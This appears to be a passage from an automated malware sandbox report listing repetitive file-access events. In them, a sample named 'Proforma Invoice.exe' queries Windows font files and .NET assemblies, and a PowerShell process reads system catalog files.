                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
